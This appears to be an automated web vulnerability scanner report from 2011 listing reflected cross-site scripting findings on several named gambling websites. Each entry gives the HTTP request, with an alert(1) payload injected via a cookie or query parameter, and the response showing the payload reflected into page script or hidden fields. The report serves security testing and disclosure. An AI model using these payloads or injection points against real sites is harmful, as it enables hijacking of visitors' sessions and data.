HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM2add4" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 104794 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM2add4"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: BO=FM196b6"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35570 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM196b6"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM14e6a" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 35571 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM14e6a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /click/MundiRasca.com/SPA |
GET /click/MundiRasca.com/SPA Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/ Set-Cookie: BO=FM2fee2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM2fee2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /click/MundiRasca.com/SPA |
GET /click/MundiRasca.com/SPA Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM472cc" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM472cc"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=1c8bcb</script><script Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:47:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... function(){ $("#brands_hopa_more") $("#brands_popular").css( }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=7d290"><script>alert(1)< Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:47:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=134a94"><script>alert(1)< Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:47:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?CMI=134a94\"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=1&8bb36"><script>alert(1)< Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:47:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <a href="/?CMI=1&8bb36\"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=1&7a9e7</script><script Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:48:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... unction(){ $("#brands_hopa_more") $("#brands_popular").css( }); }); function RedirectToUrl(url){ //alert(url); if (!url.indexOf('?')){url window.location=url; } function goto(gourl){ window.location='/'+gourl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.neogames |
Path: | / |
GET /?CMI=1&d4f66"><script>alert(1)< Host: www.neogamespartners.com Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 16 May 2011 12:47:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.1.6 X-Pingback: https://www.neogames Content-Type: text/html; charset=UTF-8 Location:https://www <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head prof ...[SNIP]... <iframe src="https://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /HelpDepositMethods.asp |
GET /HelpDepositMethods.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301379e26e--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 28416 Content-Type: text/html Set-Cookie: ARC=1301379e26e%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301379e26e--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /HelpDepositMethods.asp |
GET /HelpDepositMethods.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374871b'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:09 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 28368 Content-Type: text/html Set-Cookie: ARC=1301374871b%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /HelpDepositMethods.asp |
GET /HelpDepositMethods.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137c8bf4"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 28368 Content-Type: text/html Set-Cookie: ARC=130137c8bf4%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /InviteFriend.asp |
GET /InviteFriend.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137df246--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 26662 Content-Type: text/html Set-Cookie: ARC=130137df246%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137df246--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /InviteFriend.asp |
GET /InviteFriend.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137fe783"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 26668 Content-Type: text/html Set-Cookie: ARC=130137fe783%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /InviteFriend.asp |
GET /InviteFriend.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013767045'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 26614 Content-Type: text/html Set-Cookie: ARC=13013767045%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /Responsible.asp |
GET /Responsible.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137139aa"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:04 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23468 Content-Type: text/html Set-Cookie: ARC=130137139aa%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /Responsible.asp |
GET /Responsible.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301373a688'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23468 Content-Type: text/html Set-Cookie: ARC=1301373a688%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /Responsible.asp |
GET /Responsible.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137907a6--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23516 Content-Type: text/html Set-Cookie: ARC=130137907a6%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137907a6--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /SecurityAndPrivacy.asp |
GET /SecurityAndPrivacy.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137a689d--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20640 Content-Type: text/html Set-Cookie: ARC=130137a689d%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137a689d--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /SecurityAndPrivacy.asp |
GET /SecurityAndPrivacy.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137ac357'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:03 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20592 Content-Type: text/html Set-Cookie: ARC=130137ac357%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /SecurityAndPrivacy.asp |
GET /SecurityAndPrivacy.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137c7c28"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20592 Content-Type: text/html Set-Cookie: ARC=130137c7c28%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /aboutus.asp |
GET /aboutus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137b1e50--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22019 Content-Type: text/html Set-Cookie: ARC=130137b1e50%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137b1e50--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.primescra |
Path: | /aboutus.asp |
GET /aboutus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013730874'%3b42237077da; pscref=; plstat=0; __utmz=24585211 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 21990 Content-Type: text/html Set-Cookie: ARC=13013730874%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /aboutus.asp |
GET /aboutus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137ef6a6"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22005 Content-Type: text/html Set-Cookie: ARC=130137ef6a6%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /affiliates.asp |
GET /affiliates.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301378654c--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:51 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23726 Content-Type: text/html Set-Cookie: ARC=1301378654c%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301378654c--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /affiliates.asp |
GET /affiliates.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137d7291'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23678 Content-Type: text/html Set-Cookie: ARC=130137d7291%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /affiliates.asp |
GET /affiliates.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137d0f4e"%3balert(1)/ |
